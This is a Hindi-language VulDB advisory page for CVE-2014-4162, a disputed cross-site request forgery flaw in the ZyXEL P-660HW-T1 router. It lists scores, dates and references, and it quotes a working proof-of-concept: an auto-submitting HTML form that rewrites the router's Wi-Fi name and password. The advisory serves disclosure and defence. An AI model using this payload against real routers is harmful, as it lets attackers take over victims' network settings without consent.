ZyXEL P-660HW-T1 3 /Forms/WLAN_General_1 क्रॉस साइट रिक्वेस्ट फॉर्जरी ⚔ [विवादित]

CVSS मेटा अस्थायी स्कोरवर्तमान एक्सप्लॉइट मूल्य (≈)CTI रुचि स्कोर
4.1$0-$5k0.00

सारांशजानकारी

एक भेद्यता जिसे समस्याग्रस्त के रूप में वर्गीकृत किया गया है, ZyXEL P-660HW-T1 3 में खोजी गई है। प्रभावित किया गया है एक अज्ञात फ़ंक्शन फ़ाइल /Forms/WLAN_General_1 का। यह है, जो क्रॉस साइट रिक्वेस्ट फॉर्जरी की ओर ले जाती है। यह कमजोरी CVE-2014-4162 के नाम से सूचीबद्ध है। हमला दूरस्थ रूप से शुरू किया जा सकता है। इसके अलावा, एक शोषण उपलब्ध है. इस भेद्यता का वास्तविक अस्तित्व इस समय भी संदिग्ध है।

विवरणजानकारी

एक भेद्यता जिसे समस्याग्रस्त के रूप में वर्गीकृत किया गया है, ZyXEL P-660HW-T1 3 में खोजी गई है। प्रभावित किया गया है एक अज्ञात फ़ंक्शन फ़ाइल /Forms/WLAN_General_1 का। यह है, जो क्रॉस साइट रिक्वेस्ट फॉर्जरी की ओर ले जाती है। समस्या को घोषित करने के लिए CWE का उपयोग करने से CWE-352 की ओर ले जाता है। यह कमजोरी प्रकाशित हुई थी 28/05/2014 द्वारा Mustafa Alt?nkaynak (m_altinkaynak) के रूप में File 126812 के रूप में शोषण (Packetstorm). packetstormsecurity.com पर एडवाइजरी डाउनलोड हेतु साझा की गई है। प्रकटीकरण में यह जानकारी है:

I was told that's not open vulnerabilities.

यह कमजोरी CVE-2014-4162 के नाम से सूचीबद्ध है। 16/06/2014 पर CVE आवंटित किया गया था. हमला दूरस्थ रूप से शुरू किया जा सकता है। टेक्निकल जानकारी उपलब्ध है. इस भेद्यता की लोकप्रियता सामान्य स्तर से नीचे है। इसके अलावा, एक शोषण उपलब्ध है. इस एक्सप्लॉइट की जानकारी सार्वजनिक कर दी गई है और इसका इस्तेमाल किया जा सकता है। इस समय एक एक्सप्लॉइट की मौजूदा कीमत might be approx. USD $0-$5k है।

इसे अवधारणा प्रमाण घोषित किया गया है। यह एक्सप्लॉइट डाउनलोड के लिए packetstormsecurity.com पर साझा किया गया है। इस भेद्यता को कम से कम 7 दिनों के लिए गैर-प्रकाशित ज़ीरो-डे एक्सप्लॉइट के रूप में माना गया था। 0-डे के रूप में अनुमानित अंडरग्राउंड कीमत लगभग $0-$5k थी. एक्सप्लॉइट में प्रयुक्त कोड निम्नलिखित है:

<html>
<body onload="document.form.submit();">
<form action="http://192.168.1.1/Forms/WLAN_General_1"
method="POST" name="form">
<input type="hidden" name="EnableWLAN" value="on">
<input type="hidden" name="Channel_ID" value="00000005">
<input type="hidden" name="ESSID" value="WIFI NAME">
<input type="hidden" name="Security_Sel" value="00000002">
<input type="hidden" name="SecurityFlag" value="0">
<input type="hidden" name="WLANCfgPSK" value="123456">
<input type="hidden" name="WLANCfgWPATimer" value="1800">
<input type="hidden" name="QoS_Sel" value="00000000">
<input type="hidden" name="sysSubmit" value="Uygula">
</form>
</body>
</html>
इस भेद्यता का वास्तविक अस्तित्व इस समय भी संदिग्ध है।

कमज़ोरी अन्य कमज़ोरी डेटाबेस में भी प्रलेखित है: SecurityFocus (BID 67653), X-Force (93490) , Secunia (SA58513).

उत्पादजानकारी

प्रकार

विक्रेता

नाम

संस्करण

लाइसेंस

वेबसाइट

CPE 2.3जानकारी

CPE 2.2जानकारी

CVSSv4जानकारी

VulDB वेक्टर: 🔍
VulDB विश्वसनीयता: 🔍

CVSSv3जानकारी

VulDB मेटा बेस स्कोर: 4.3
VulDB मेटा अस्थायी स्कोर: 4.1

VulDB मूल स्कोर: 4.3
VulDB अस्थायी स्कोर: 4.1
VulDB वेक्टर: 🔍
VulDB विश्वसनीयता: 🔍

CVSSv2जानकारी

AVACAuCIA
💳💳💳💳💳💳
💳💳💳💳💳💳
💳💳💳💳💳💳
सदिशजटिलताप्रमाणीकरणगोपनीयताअखंडताउपलब्धता
अनलॉक करनाअनलॉक करनाअनलॉक करनाअनलॉक करनाअनलॉक करनाअनलॉक करना
अनलॉक करनाअनलॉक करनाअनलॉक करनाअनलॉक करनाअनलॉक करनाअनलॉक करना
अनलॉक करनाअनलॉक करनाअनलॉक करनाअनलॉक करनाअनलॉक करनाअनलॉक करना

VulDB मूल स्कोर: 🔍
VulDB अस्थायी स्कोर: 🔍
VulDB विश्वसनीयता: 🔍

NVD मूल स्कोर: 🔍

शोषणजानकारी

वर्ग: क्रॉस साइट रिक्वेस्ट फॉर्जरी
CWE: CWE-352 / CWE-862 / CWE-863
CAPEC: 🔍
ATT&CK: 🔍

भौतिक: नहीं
स्थानीय: नहीं
दूरस्थ: हाँ

उपलब्धता: 🔍
प्रवेश: सार्वजनिक
स्थिति: अवधारणा प्रमाण
लेखक: Mustafa Alt?nkaynak
प्रोग्रामिंग भाषा: 🔍
डाउनलोड: 🔍

EPSS Score: 🔍
EPSS Percentile: 🔍

मूल्य पूर्वानुमान: 🔍
वर्तमान मूल्य अनुमान: 🔍

0-Dayअनलॉक करनाअनलॉक करनाअनलॉक करनाअनलॉक करना
आजअनलॉक करनाअनलॉक करनाअनलॉक करनाअनलॉक करना

Exploit-DB: 🔍

खतरे की खुफियाजानकारी

रुचि: 🔍
सक्रिय अभिनेता: 🔍
सक्रिय APT समूह: 🔍

प्रतिव्यवस्थाजानकारी

सिफारिश: कोई शमन ज्ञात नहीं
स्थिति: 🔍

0-दिवसीय समय: 🔍
शोषण विलंब समय: 🔍

समयरेखाजानकारी

21/05/2014 🔍
22/05/2014 +1 दिन 🔍
23/05/2014 +1 दिन 🔍
26/05/2014 +3 दिन 🔍
28/05/2014 +2 दिन 🔍
28/05/2014 +0 दिन 🔍
02/06/2014 +5 दिन 🔍
16/06/2014 +14 दिन 🔍
16/06/2014 +0 दिन 🔍
26/06/2014 +10 दिन 🔍
20/09/2024 +3739 दिन 🔍

स्रोतजानकारी

विक्रेता: zyxel.com

सलाह: File 126812
शोधकर्ता: Mustafa Alt?nkaynak (m_altinkaynak)
स्थिति: पुष्टि की गई
विवादित: 🔍

CVE: CVE-2014-4162 (🔍)
GCVE (CVE): GCVE-0-2014-4162
GCVE (VulDB): GCVE-100-13408
X-Force: 93490 - Zyxel P-660HW-T1 multiple cross-site request forgery, Medium Risk
SecurityFocus: 67653 - Zyxel P-660HW-T1 Multiple Cross Site Request Forgery Vulnerabilities
Secunia: 58513 - ZyXEL Prestige 66x Series Routers Cross-Site Scripting and Cross-Site Request Forgery Vuln, Less Critical
OSVDB: 107449

scip Labs: https://www.scip.ch/en/?labs.20161013
यह भी देखें: 🔍

प्रविष्टिजानकारी

बनाया गया: 02/06/2014 05:17 PM
अद्यतनित: 20/09/2024 04:51 AM
परिवर्तन: 02/06/2014 05:17 PM (74), 02/04/2019 05:34 PM (5), 20/06/2021 02:22 PM (3), 20/09/2024 04:51 AM (14)
पूर्ण: 🔍
Cache ID: 216::103

VulDB is the best source for vulnerability data and more expert information about this specific topic.

चर्चा

अभी तक कोई टिप्पणी नहीं भाषाएँ: hi + ne + en.

टिप्पणी करने के लिए कृपया लॉगिन करें

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!